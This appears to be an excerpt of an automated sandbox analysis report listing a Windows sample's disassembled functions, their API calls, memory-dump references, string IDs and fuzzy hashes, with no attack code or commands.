                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                                                                                                                Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                                                                                                                                • SendMessageW.USER32 ref: 00471740
                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047184F
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4116747274-0
                                                                                                                                                                                                                • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                                                                                                                • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                                                                                                                                Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00461683
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00461721
                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                                                                                                                                • GetParent.USER32(?), ref: 004618C3
                                                                                                                                                                                                                • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                                                                                                                • String ID: %s%u
                                                                                                                                                                                                                • API String ID: 1899580136-679674701
                                                                                                                                                                                                                • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                                                                                • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                                                                                                                                Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoItemMenu$Sleep
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 1196289194-4108050209
                                                                                                                                                                                                                • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                                                                                                                                • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                                                                                                                                Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0043143E
                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                                                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                                                                                                                                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                • API String ID: 3300687185-3887548279
                                                                                                                                                                                                                • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                                                                                                                                • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                                                                                                                                Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                                                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                • API String ID: 1976180769-4113822522
                                                                                                                                                                                                                • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                                                                                                • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                                                                                                                                Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 461458858-0
                                                                                                                                                                                                                • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                                                                                                • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                                                                                                                                Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                                                                                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3969911579-0
                                                                                                                                                                                                                • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                                                                                                • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                                                                                                                                Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 956284711-4108050209
                                                                                                                                                                                                                • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                                                                                                                • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                                                                                                                                Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                • String ID: 0.0.0.0
                                                                                                                                                                                                                • API String ID: 1965227024-3771769585
                                                                                                                                                                                                                • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                                                                                                                                • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                                                                                                                                Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: SendString$_memmove_wcslen
                                                                                                                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                • API String ID: 369157077-1007645807
                                                                                                                                                                                                                • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                                                                                                                • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                                                                                                                                Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetParent.USER32 ref: 00445BF8
                                                                                                                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
